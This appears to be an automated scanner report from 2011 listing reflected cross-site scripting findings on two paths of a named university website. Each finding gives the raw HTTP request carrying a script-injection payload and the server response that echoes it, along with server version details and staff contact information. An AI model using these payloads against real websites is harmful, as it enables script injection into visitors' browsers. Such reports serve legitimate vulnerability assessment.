1. Cross-site scripting (reflected)
1.1. http://www.hawaii.edu/cybersecurity/ [REST URL parameter 1]
1.2. http://www.hawaii.edu/favicon.ico [REST URL parameter 1]
Severity: | High |
Confidence: | Certain |
Host: | http://www.hawaii.edu |
Path: | /cybersecurity/ |
GET /cybersecurity72768"><script>alert(1)< Host: www.hawaii.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 17 Apr 2011 14:18:20 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Length: 6367 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="c ...[SNIP]... <input type="text" name="this" value="/cybersecurity72768"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hawaii.edu |
Path: | /favicon.ico |
GET /favicon.ico5ed25"><script>alert(1)< Host: www.hawaii.edu Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 17 Apr 2011 14:32:19 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Length: 6364 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="c ...[SNIP]... <input type="text" name="this" value="/favicon.ico5ed25"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.hawaii.edu |
Path: | /cybersecurity/ |
GET /cybersecurity/ HTTP/1.1 Host: www.hawaii.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 14:18:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 12897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <p>For more information on any of these activities, please contact: Jodi Ito, 956-2400 (jodi@hawaii.edu) or Larry Wiss, ITS Communications Officer, 956-9393 (wiss@hawaii.edu)</p> ...[SNIP]... |